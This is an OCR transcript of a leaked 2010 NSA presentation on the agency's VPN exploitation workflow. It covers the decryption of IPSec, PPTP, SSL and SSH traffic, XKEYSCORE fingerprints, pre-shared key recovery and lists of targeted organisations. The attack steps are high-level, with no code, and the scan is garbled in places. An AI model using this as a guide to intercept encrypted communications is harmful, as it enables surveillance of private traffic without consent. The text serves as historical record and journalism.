Title: Intro to the VPN Exploitation Process

Release Date: 2014-12-28

Document Date: 2010-09-13

Description: This 13 September 2010 presentation from the NSA’s OTP VPN Exploitation Team explains the work of the division: see the Der Spiegel story Prying Eyes: Inside the NSA’s War on Internet Security, 28 December 2014.

Document: TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Intro to the VPN Exploitation

Process

OTP VPN Exploitation Team

S31176

September 13, 2010

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Overview

i S31176 and the OTP VPN Exploitation Team

■ How can we help you?

■ VPN and Network Encryption Types

■ Birth of the VPN Adventure
i Sustained Exploitation

i Exploitation Successes
i Conclusions

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

S31176

Branch Name:

Custom Thread Development for
Network Encryption

Team Name:

OTP VPN Exploitation Team

3

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Mission Statement

S31176 provides cryptanalytic support services for many
network encryption protocols, including, but not limited to:
IPSec, SSL, PPTP, SSH and proprietary protocols. We are
the front-door of CES for targeted vulnerability assessment
and custom interim end-to-end exploitation flows for these
protocols. In conjunction with various agency SIGDEV
counterparts and target organizations, we engage in
discovery to find TOPI targets of interest. By maintaining
contact with field sites, TAO, and NCSC, we endeavor to
guide and direct development and access through both
active and passive means in order to make exploitation
possible and enable full prosecution of the target...

4

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Purpose in a Nutshell

i Act as your one stop shop for all VPN and
network encryption exploitation related
issues!

i Act as a liaison for SIGDEVers and TOPIs
to other areas of the VPN community

i Perform some SIGDEV and target
discovery

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

5

SID, S

Data Acquisition, S3

„Cryptanalytic Exploitation
Services, S31

Office of Target Pursuit,
S311

Cryptanalytic Exploitation
¿Discovery, S3117

Custom Thread
Development for
Network Encryption,
S31176

m

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

/



S31176 Branch Members

- Collection

- CMP Intern
-Team Lead, IPSec, SSH

- IPSec
- Branch Chief

- Diversity Tour

- CADP Intern

- PPTP

•; - BLEAKINQUIRY, SSL

How to Contact us (May be changing soon):

go vpn-xft

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

7

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Branches within OTP

531171 - PRC, N Korea, SE Asia, Japan

531172 - Iran, Hamas, Iraq, Saudi Arabia

531173- Africa, Levant, Latin America, India,

Pakistan, Afghanistan

531174- Russia, Counter-Intel, Europe, FTM

531175 - Cross-Target Support Branch

531176 - Custom Thread Development

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

8

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Exploitation in the OTP Branches

Each branch has a VPN representative

We inform them about attacks, they inform us about targets
If you have a target-specific inquiry, they may be able to help

m ' / / / y / / / / ■ / / / / / / y

■ S31171 (Eastern and Southeast Asia)

* S31172 (Iran, Iraq, Arabian Peninsula)

■ ),

S31173 (Levant, Central Asia, Africa, Latin America)

S31174 (Russia, Europe, International Targets)

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

9

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

How can we help you?

Provide Exploitation Support

■ Provide VPN vulnerability analysis

Engage Network Security Products, TAO, ESO, etc

■ Convey meaningful feedback to customer

■ Develop sustained exploitation threads when
possible

/A Suggest alternative approaches if passive
exploitation is unrealistic

71 DECRYPTS, DECRYPTS, DECRYPTS!!!!!!

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

10

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Additional Services

We can assist with the following:

■ Collection problems
Tasking

■ Data flow

■ Plaintext analysis
/y/y Metadata interpretation

■ Tip-off vulnerable VPN links
: ■ VPN SIGDEV

Target Discovery and Development

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

11

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

How can you help you?

Glad you asked!

■ Familiarize yourself with appropriate search criteria

■ Get a BLEAKINQUIRY account

■ If you find VPN-related data, let us know.

The existence of a VPN on a network of interest
Configuration/setup information about the VPN

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

12

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

BLEAKINQUIRY

Metadata database of potentially exploitable VPNs
■ Data Sources

■ TOYGRIPPE metadata testing

■ XKEYSCORE fingerprints
//■ Daily VPN exploitation

7 Let us stress...’’P-O-T-E-N-T-l-A-L”

y Want an account?

■ E-mail or

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

13

rh Search

Submit Quer:-

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

BLEAKINQUIRY

1S//BRI, n
1S//REL 0
■ia//KKL u
10//IU3L 0
1S//BKI. n
1S//REL 0
•IS//KKL u
0
TS/ZBRI. h
1S//REL 0
■ia//KKL U
10//IU3L 0
1S//BKI. s
1S//REL 0
•IS//KKL U
0
TS/ZBRI. n
1S//REL 0
•laZ/KKL u
0
1S//BKI. 1
1S//REL 0
•IS//KKL U
0
13//PSL 0
1SZ/REL 0
1S//REL 0
1SZ/HF □
1SZ/HEL 0
1S//REL 0
1S//REL 5
13//REL 0
1SZ/MF 0
1SZ/HF 0
1S//REL 0
1S//BEL 0
'ISZ/NF 5
1S//REL 0
i 1

BLEAKINQUIRY - Mozilla Firefox

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Local IPSec Processing

XKEYSCORE

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

15

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Type 1: IPSec

■IPSec: IP Security

■ Complete paired IKE

■ Common UDP ports: 500 and 4500

■ Pre-Shared Key (PSK)

Router configuration (good source for PSKs)

r Encrypted Payload (ESP or AH)

Next Protocol 50 or 51

■ XKEYSCORE Queries

Full log DNI search

AppID/Fingerprints: “vpn/*”, “vpn/esp”, “vpn/isakmp”, “vpn/ikev2”,
“vpn/ikev2_content”

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

16

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Type 2: PPTP

PPTP: Point-to-Point Tunneling Protocol
Paired collect

■ Next Protocol 47 = PPTP payload
TCP Port 1723 = PPTP tunnel set up, no payload

One-sided collect, client side

XKEYSCORE Queries

v* Full log DNI search

A Enter your IPs/casn/etc of interest
• AppID/Fingerprint: “vpn/pptp_encr*”

■ Share your results with

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

17

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Type 3: SSL

SSL - Secure Sockets Layer

Renamed TLS (Transport Layer Security) but still often
referred to as SSL

Paired collect - Compare IP’s and Ports
Server Certificates

Port Numbers: 443, 465, 989, 990, 992, 993, and
995

XKEYSCORE Queries

Full log DNI search or use SSL plugin

AppID/Fingerprints: “encryption/ssl/*” or
“network encryption/ssl/*’’

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

18

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Type 4: SSH

■ SSH - Secure Shell

Industry-standard networking protocol for securely
logging into other machines via a network.

■ Complete paired traffic

■ Port number 22

Potentially recover user names and passwords

■ Useful to TAO to access boxes and gather
cryptographic information

^XKEYSCORE Queries

/ ■ Full log DNI search

AppID/Fingerprints: “terminal/ssh/*"

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

19

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Birth of the VPN Adventure

We receive VPN-related requests from across the Globe

' ///z , . ''' v TOPIs

■ SIGDEV Analysts
/% OTP Analysts
Cryptologic Centers
XAA Field Sites

/ / y/ ,/ y/ y/ y/ y/ y/ y/ y

Second Parties

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

20

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

The Many Flavors of Requests

IP Links &
Ranges

VPN

Metadata

BLEAKINQUIRY

Accounts

IPSec,
PPTP, SSLt
SSH

Router -
Information

XKEYSCORE

Fingerprints

VPN

EXPLOITATION

TEAM

Domain

Names

Network

Protocols

Interesting
Terms &
Names

Vulnerability

Evaluations

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

1. Initial Steps

VPN Info Found/Question Arises

Task Assigned to Team Analyst

Gather Background Info About Request

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

22

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

2. Consult Repositories

BLEAKINQUIRY - Metadata database of potentially exploitable VPNs

^ TOYGRIPPE - VPN metadata repository

PINWALE - Long-term repository for
tasked SIGINT collect

■ XKEYSCORE - Processes and databases DNI
collect from various field sites

Full-take feed (tasked and untasked)

■ VULCANDEATHGRIP - Repository for
tasked, full-take VPN collection

■ FOURSCORE - PPTP repository

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

23

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

3. Scripts: IPSec Focus

■ Format downloaded repository files

* Create intermediate processing files

■ Check for potential vulnerabilities

■ Search for PSKs in CORALREEF

* Run attacks to recover PSK

■ Decrypt traffic

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

24

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

4. Communicate Results

Can we decrypt the VPN traffic?

If the answer is “No” then explain how to
turn it into a “YES!”

If the answer is “YES!” then...

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

25

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Happy Dance!!

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

YES! We Have Decrypt!

Notify customer of success

Send decrypt through post-processing and
deliver to TOPI

Have TOPI determine the priority level of the
resulting plain text

Get IPs on sustained collect

Set up and transition sustained decryption
process to OTP VPN Branch Rep

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

27

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Turn that Frown Upside Down!

From “No” to “YES!”

■ Depends on why we couldn’t decrypt it

■ Find Pre-Shared Key

■ Locate complete paired collect

■ Locate both IKE and ESP traffic
Have collection sites do surveys for the IP’s
Find better quality collect with rich metadata

/

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Contact Our Friends for Help

Network Security Products

■ Develop decryption algorithms

Tailored Access Operations

Computer Network Exploitation to create access points

Collection Sites

//* Perform surveys for the IPs of interest

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

29

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

More Friends

■ NSA/CSS Commercial Solutions Center

/ ■ Manage industrial relationships

■ SIGDEV

z ■ Develops tools and methods to help you find
the traffic you desire

■ OTP VPN Representatives

Assist in locating traffic of interest

■ TOPI

/ /" Target knowledge

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

30

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Sustained Exploitation

■Develop sustained exploitation thread
AFTER the TOPI confirms the decrypts are
interesting

■TOPI must task IP in CADENCE
■Task Port and IP
■UTT does not have boolean logic
■Categories

IPSec: 6640 (protocols) and 6648 (ports)

PPTP: 6648 (ports)

/^V^SSL: 6647 (ports)

■ Get the crypt system title

Work with the OTP VPN Regional Branch representative

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

31

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Establish the Data Flow

■Establish the correct corporate data flow
■CES data flow guru

Make sure the correct routing tags and categories
are appended to the data

Direct tasked traffic to correct data repository

■PIN WALE

x/ ■VULCANDEATHGRIP- IPSec
■VULCANMINDMELD - SSL
■FOURSCORE - PPTP

Try to avoid relying on XKS workflows due to legal and
logistical issues

XKEYSCORE - SSH using XKS workflows directed to
a file directory

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

32

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Data Flow Integrity

Evaluate data integrity, quality, & quantity

Different collectors produce different metadata
formats

■Need rich metadata

Need all the pieces (IKE and ESP for IPSec)

Ensure that the data is not garbled and headers
attached appropriately

Check that the data volume is what is expected

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

33

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Collection Sites

/ ; Contact Collection Sites if there are data
issues

z "Malformed headers
■Missing metadata
■Missing payload
// 'Garbled data
■Low volume
„ 'Single-sided traffic

/■Collection sites sometimes only collect one-
side of the VPN traffic

■Need to collaborate with both sites

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

34

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Decrypt Processing

^Decrypt the VPN traffic

■Create SRI files for decrypts

■Send the decrypt and SRI files to
TURTLEPOWER (IPSec, PPTP) or CAPRI OS (SSL,
SSH) for post-processing
//^Decryption of payload
■Decompression
■Unrar files

/ y/ y/ yZ y/ y/ / / / / / ' / / / / / / ' /

Route to appropriate data repository according
to the crypt system title and type of decrypt (text,
voice, etc)

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

35

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Decrypt Repositories

^PINWALE

^Tasked IPSec, PPTP, and SSL

Must be placed in the correct partition according to
classification (REL FVEY, NOFORN, FISA)

■XKEYSCORE

/^SSH - often have router configurations and user
credentials which are easier to view in XKS than
PINWALE

■Still developing the process

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

36

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

TOPI Evaluation

Analyst locates the decrypts in PINWALE and/or
XKEYSCORE

■Viewing the decrypts

/ ■ PINWALE,

■XKEYSCORE

■AGILITY

■DNIPRESENTER

/■Contact TURTLEPOWER or CAPRI OS if there are
file rendering issues

Also try the Unidentified Protocols team in s S31122 for
help identifying unknown protocols

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

37

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Thread Monitoring

Responsibility for monitoring these
exploitation threads are transferred to the
OTP VPN Regional Branch representative
^ After the thread is established and stabilized

■Trouble shoots decryption and collection
issues

Set up a cron job to run the decryptor
every day

Hopefully the TOPI continues to identify
and report mission-critical intelligence from
these decrypts

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

38

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Success 1: IPSec

Follow-the-Money and TAO Targets

TOPI (S2C22) has had a close
relationship with TAO for quite some time

FTM Target 1

■Not susceptible to any of NSP’s implants

got the configuration files which
provided us the PSKs to enable passive
exploitation

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

39

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Success 1: IPSec

FTM Target 2

■ TAO got on the router through which banking
traffic of interest flows

■NSP had an implant which allows passive
exploitation with just ESP

Successful exploitation for the past two
years

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

40

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Success 2: PPTP

* Airlines

■ Iran Air, IRTAA

■ Royal Jordanian Air, JOTAA

■ Transaero Airlines, RUCAC

■ Telecommunications

Mir Telematiki (pending system title)

1 Afghani Wimax (pending system title)

//■/ Government

//f Mexican Diplomatie, MXDBB

Pakistani General Intelligence, PKRAQ
Turkish Diplomatie, TUDAT
Afghanistan Government, AFYAD

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

41

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Success 2: PPTP

^Banking and Financial

■Zaad Financial

Ewallet transactions of a principal financial node for
Somali terrorist activity

//A Follow-the-Money customer
■Kabul Bank
■BNI Banking, Indonesia

Formed and owned by the Indonesian government

//■Banking transactions over “Flexy,” Telkom
Indonesia’s fixed wireless network

■Other

■IRGC cyber attacker

Nigerian power company’s internal network

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

42

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

Reminders

If it’s not exploitable now, that doesn’t mean it
won’t be later

We collaborate and communicate with our
friends to produce decrypts

Traffic must be both good quality and the
correct type

TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL

43

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh